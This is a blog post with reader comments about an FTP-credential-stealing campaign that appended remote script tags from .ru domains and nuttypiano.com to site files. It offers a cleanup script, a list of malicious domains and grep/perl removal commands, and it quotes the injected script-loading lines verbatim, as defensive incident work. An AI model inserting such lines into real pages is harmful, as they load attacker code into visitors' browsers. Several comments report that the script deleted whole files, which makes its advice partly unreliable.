Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!
I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only and search and fix.
Click here to see the .RU Removal Script in action! (demo)
or…
Click here for the .RU Removal Script Source Code
or here for it on PasteBin
Let me know in the comments if it works for you or if you have any feature requests!
Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.
It looks like this in JavaScript files:
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');
PHP or HTML files contain the following at the end:
<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script> <!--3848d52fcd665b3d7d96c22e5b6a5451-->
Here is a short list of some domain names that we’ve come across…
Known Malicious Domains:
- pocketbloke.ru
- inkrainbow.ru
- pantsletter.ru
- fightkid.ru
- shirtdifficulty.ru
- casechick.ru
- obscurewax.ru
- nuttypiano.com
- Many others… (comment domains you find below)
STEPS TO TAKE TO REMOVE THE THREAT:
- Run MalwareBytes and get rid of anything on your machine
- Uninstall your FTP client
- Change your FTP passwords
- Update JAVA – According to this CERT KB
- Remove all traces of the scripts from your domains
UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.
Here it is (I called the php file russians-clean.php):
Warning: Wrong parameter count for preg_replace() in /home/flightsi/public_html/russians-clean.php on line 43
after many similar lines it said:
Done searching 32268 files in 34.17 seconds
Just ran the script as well. Wiped my forum clean… Nothing left on it. Perhaps look into it? Thank you for all the useful information though.
I have also suffered a few hacked pages this weekend.
Had a look at the script that was installed on my sites. Seems to be similar to the vulnerabilities described here http://www.exploit-db.com/exploits/12117/ and here http://www.kb.cert.org/vuls/id/886582
I guess I must have visited an infected site which launched some arbitrary Java code which read my filezilla.xml file and got my ftp passwords. Hadn’t infected all my sites seemed to be working its way through them a-z
Actions I have taken
I am running Windows XP SP2, Firefox 3.03, FileZilla 3.2.6.1
1. Remove passwords from FileZilla and select Logontype: “Ask for password” – check FileZilla.xml to make sure that passwords have been removed.
2. Change ftp usernames and passwords
3. Removed plugin Java Quickstarter from Firefox (npdeploytk.dll)
4. Disabled automatic Java updates which I think installed this plugin automatically
5. Fixed infected files by re-installing site backup.
Looking through my ftp log – all index.* and *.js files were infected.
Hope this help
Fantastic work with the fix. Thanks!
New script works well.
I wonder how widespread this actually is? There are lots of reports of bank websites being unavailable over the last weekend and I wonder if the target for this virus wasn’t our little sites but a bigger fish…?
Just had a word with a colleague in France and he’s been done for 5 sites – was using FZ. Helping him clean up now.
It looks like there’s growing awareness of this-
http://www.wintercorn.com/article/225-new-malware-alert-pocketbloke-inkrainbow-and-pantsletter
Wonder how big it will all get?
Hi
My own website has been infested with this thing but as I’m just an average PC guy I’m not exactly sure how to run the fix.
I’ve uploaded it into the main dir of my website and tried to open it but that doesn’t seem to do any.
What am I doing wrong?
-Al
Assuming you run a Linux server. Don’t know if it will run on Windows.
Upload it into your public directory and then type in yourdomain.com/filename.php. Obviouslt replacing the yourdomain and filename with the correct ones. It will then run and clean your site.
Thank you very much. I’ve tried doing it and it does seem like the site has indeed been cleaned up! I guess I’ll have to be more careful about storing passwords :p
@Default User
The script should run on either *nix based or Windows systems. I’m in the process now of writing a better, more interactive script that will show you what will be fixed before it edits your code. I should have it up shortly.
thanks for all your hard work dude!
Thank you so much…this seems to have done the trick. I had some code that was fightkid.ru as well.
Hi Nate,
I finally found the files that are messing up your script, making it clean out ENTIRE files instead of just replacing the offending code.Hope you can use it somehow. I have now reverted back to downloading the entire sites, cleaning them with Dreamweaver’s editor, then uploading them again. Especially for WordPress sites there seem to be some problems at times, where links are no longer working.
I also found at least one of my sites had ‘bad’ database backups, so I couldn’t restore from a backup made AFTER the infection. Not sure if it has anything to do with all this though.
Anyway, the files that apparently are being a problem for your scanner are named something like this:
.wysiwygPro_edit_61a73fa3aa5fd7cba2bed0366aa8ec58.php
There’s weird code inside too (I have a copy if you want).
Apparently these files are put onto one’s root when using an editor fro the cPanel application (which I use on all of my sites to manage them). I do NOT use that editor often (certainly not knowingly), so that may explain why I only have it on 3 of my 31 sites.
Francois
Francois is spot on: my WYSIWYG editor isn’t working after running the cleaner script.
@Francois
Francois,
Please e-mail me a copy to nate _a@t_ natestiller.com and I will be able to fix the script.
Thanks
@Carlos
Check out the new script!
@Björn
No problem man! Check out the new script and let me know how it works for you!
I also have several sites contaminated pocketbloke.ru
Today was a new attack and insertion site is nuttypiano.com
The hacked websites more people have FTP access – File Zille is the cause?
Thank you, Martin
@Martin .. did you clean your PC first? Ned to run anti-malware and virus checker and make sure your protection is in order (Shields Up Scotty !!!
). The actual virus stopped my (Windows) firewall and Security Center.
Also make sure you have changed all site’s passwords (main and ftp) and preferably do not save them in the ftp client anymore after that (I know I can’t, with over 30 sites, back-ends and other admin accesses to them, I would go crazy typing them in every time).
@Nate
Willdo Nate….. been too busy to read here, sorry.
Well, they come to ( .com ) right now, not only russians domain.
New malicious domain with this kind of script injection.
nuttypiano.com
here is the injection:
On javascript files:
document.write(”);
On php, asp, html, htm files:
@Marvin
Sorry, paste direct code:
correct:
On javascript files:
document.write(‘<sc’+'ript type=”text/javascript” src=”http://nuttypiano.com/Vector_Graphic.js”></scri’+'pt>’);
On php, asp, html, htm files:
<script type=”text/javascript” src=”http://nuttypiano.com/Hardware.js”></script>
@Marvin
So you have not cleaned your PC yet…… as far as I have been able to assess the virus itself sits on your own PC, reading your ftp client(s), and getting access to your websites through there.
You’ll need to clean up the PC first, before cleaning your websites is any use. Maybe you have others accessing your site(s) too?
@Francois
I cleaned my pc and all my websites. One of them was infected with this domain that isn’t part of my websites.
I had this problem, and used the following (linux command line) commands to get it off:
1. Search for infected files – change to the bottom, or root directory of your websites (for me it was /home), and run this command:
grep -H -r “http://*\.ru” ./
or
grep -H -r “Password.js” ./
or
grep -H -r “Kibibyte.js” ./
etc
(put what you are searching for between the “”)
2. to remove the hack, i just changed the link of the script to javascript:void() using this command:
find ./ -type f | xargs perl -pi -w -e ‘s/http\:\/\/yellowbarn\.ru\/Kibibyte\.js/javascript\:void\(0\)/g;’ *.html
or
821 find ./ -type f | xargs perl -pi -w -e ‘s/http\:\/\/yellowbarn\.ru\/Kibibyte\.js/javascript\:void\(0\)/g;’ *.php
notice that each command ends with the extensions you want to search, ie. *.html, *.php, *.js, etc
Worked for me. Make sure you change your FTP passwords on a machine that IS NOT infected with the trojan/virus.
one last note – I realize this isn’t a perfect solution – you probably could use *.* at the end of the find commands above, but you probably don’t need to search/replace in EVERY file on your server. I also realize you have to know the name of the domain name and/or name of the javascript file that is being called beforehand…..
Cheers,
Clarkson
@Francois
1) Yes, I cleaned the PC and then changed the FTP password, which I have not uploaded to the client (I use FreeCommander to File Zilla, I only ask because my colleague using File Zilla)
Among the infected site was the site, which I never approaches the FTP client should not, therefore, think of me is not the disease – when cleaning my PC malwarebytes.com found nothing.
The third mate used Total Commander (!), But did not find anything malwarebytes.com also in the test …
It depends on your FTP client … or not?
2) The password to the FTP client will not have to save, but it must be stored in a txt file for example and always be copied via the clipboard when you sign up for FTP – Is it safe?
Thank you, Martin
@Clarkson
Yes, and it appears there are more and more popping up, so how do we find them ????
Search for ‘.ru’ and then filter the malware out. It’s possible that some files have a legit .ru domain in them, can’t imagine why though.
Alright, I found the latest problem. One of my sites gets pointed to via another (of a former partner). HE has not changed the password, so THAT one got infected again (!!), giving warnings to people using that old domain name.
I threw everything away now and alerted him to change the passwords.
So I think my sites remain clean…. phew !!!
@Martin (not Marvin
): yes, you can save your passwords in a text file instead of your ftp client. The virus will probably only scan for known ftp programs.
On the other hand, it is even better storing them ‘off-line’ and encrypted. I have all my passwords on a USB stick, encrypted, fro Roboform.
Fore ftp I use CoreFTP lite and Direct FTP by CoffeeCup software.
I don’t think it makes a difference which one you use.
@Navvie
Thank you for your advice.
I will have saved passwords in FTP client, but I have over the clipboard to copy a password to connect. It is quite possible that the virus will register a new FTP connection and looks at the last entry in the clipboard, right? Then I had to manually copy the password which is really bad
USB keychain and RoboForm she could help with that clipboard? (Roboform.com is new to me)
@Martin
* I will not have passwords stored in the FTP client….
So it appears that not only .RU domains are involved which makes this more difficult. I just found a nuttypiano.com on another one of my websites. I think I’m going to edit the script to pull any JavaScript inclusions and then you can choose which to remove.
Any ideas?
@SOB
Thanks SOB for the help! Good call on the CERT KB. However, it looks like this is a newer attack vector using an old vulnerability.
not sure about how this trojan/virus is gleaning the FTP credentials….. in my case, I don’t even use FileZilla – I use Dreamweaver CS5 – and yes, the FTP credentials are stored on my system, via Dreamweaver.
I’m fairly sure ony one other person had the FTP credentials, and she was using a Mac, so it’s unlikely it was her – more likely me on a PC. But again – I don’t use filezilla – not even installed here.
It might work as a proxy, ie, it will listen and catch ANY ftp traffic to and from your computer, regardless if it comes from Filezilla, Dreamweaver, etc..
@Nate
For me, any file that had the hack with the script line, it was ALWAYS at the bottom of the page, right before the tag.
Surf the website in question, View Source in your browser, and scroll all the way to the bottom – look for the hack, make note of the domain name/js file being called. On Joomla sites, make sure you login to the administrator part, and view source again – most of my Joomla sites had the hack in the main pages AND the admin.
This is my experience only, perhaps for others the hack is being placed somewhere else in the code, but for me, every single time last line of code. Makes it easier to find
Keep in mind that the virus that steals these passwords also “sniffs” the FTP traffic leaving the PC.
In order to block this you should see if your hosting provider supports SFTP. It encrypts the traffic making it more difficult to sniff.
Just looking through the FTP logs for the attack day for one site and I noticed that the bot cycles through dozens of different IP address from all over the world over a 2 hour period and hit 1756 files.
The attacks are milliseconds apart but difficult to prevent as they are from normal ISP’s in Canada, Europe, USA etc.
@Default User
Yup, I went through my logs too. Turned up 34 different IP unique addresses, although many were used multiple times and on different domains.
Looking at the diversity I would say all servers were hacked already for that purpose. Some were of Internet hosts !
@Nate Yes, I too can confirm that ALL injected code was n the last lines of the .html and .js program sources. Files infected that I found were only combinations with ‘index’ and ‘main’ in the filename and just about all .js files.
For some strange reason NOT all files in all folders were altered. And not all of my sites, although many more were stored in my ftp client. But I also did NOT actually access the domains that were hit during the time I had the virus working on my main PC.
So for some reason it missed some sites and/or passwords.
Hi
Thanks for doing this for us non-technical people.
However, I’m very frustrated as I ran the .php on ONE of my sites and it gave every impression of working so I have submitted it for review.
But I can’t for the life of me make it run on a second one (it just displays the code) and can’t think what I’ve done differently.
I downloaded the file, which was a .txt
Rename it to .php and transferred it to my site at the same level as my index.html file
Remembered to change attributes to make it executable
In my browser, typed
domain/russianhackcleaner.php
Got the usual warning message, ignored it
But then it just displays the code, and won’t execute it
Any ideas gratefully accepted.
Thanks for this script, Nate! Google flagged three files that had the nuttypiano.com link but your script found another 60 or so.
There are so many files on my site (user-created) that the script timed out before recursing through all of it, so I modified the script to do one directory at a time. To do the /01/ directory, for example, I changed it to:
$files = directoryToArray(“./01/”, $recurse);
Once I did that, though, I couldn’t use the cleanup part of the script. It choked on line 100 with a “wrong number of parameters” error or something like that.
I imagine I’ll need to run this script again in the future, so I hope you’ll continue to refine it. Thanks again!
Hi Nate,
have you found a way to find the nuttypiano files, too?
Cheers
Philipp
@Joy
Joy,
Does this domain have PHP installed on it? Shoot me an e-mail at “nate[at}natestiller.com” if you can’t get it working.
@Philipp
I’m working on a new version that will show you everything that it “suspects” and then you can choose what to remove. This is so it won’t break anything on your site.
Discovered my problem was that php not allowed! Duh
I use WordPress and I cannot make it work wherever I copy the script. =/
Something that might limit the amount of hunting you have to do:
Since we know the attack vector is via FTP, check your FTP logs first – as noted by Navvie above, the attacks are easy to spot: hundreds, if not thousands of different hosts uploading files to same account, concurrently.
make note of the account(s) being attacked, and change the FTP passwords on those accounts immediately.
Now that you know what accounts were being attacked/hacked, limit your searches using either Nate’s great tool, or other manual methods listed above, to only those accounts. Now you don’t have to search through your entire FTP file system on the server.
Cheers
Thanks for the script, really appriciate your work here.
I have this hack on 6 hosting accounts now and each account has 100k+ files as each account has about 100 domains with wordpress installed on it
My site vidyaweb.com was also taken down by infection from pocketbloke.ru. I made do by using Filezilla without saving passwords in Quickconnect Bar for a week. Today, I scanned my PC and discovered two suspected hidden files kkypqe.sys and frtisc.sys in the folder c:\windows\system32\drivers suspected to be rootkits by Avira anti virus with hidden registery keys with the same name. However, Avira was not able to delete it and had to resort to booting through Linux and deleting the suspected files.
Thereafter, I was also able to delete the registry keys too, but only after changing permissions on them. Besides these, no other infection was detected by Avira.
Can I safely assume now that I am free of malware and start trusting Filezilla again.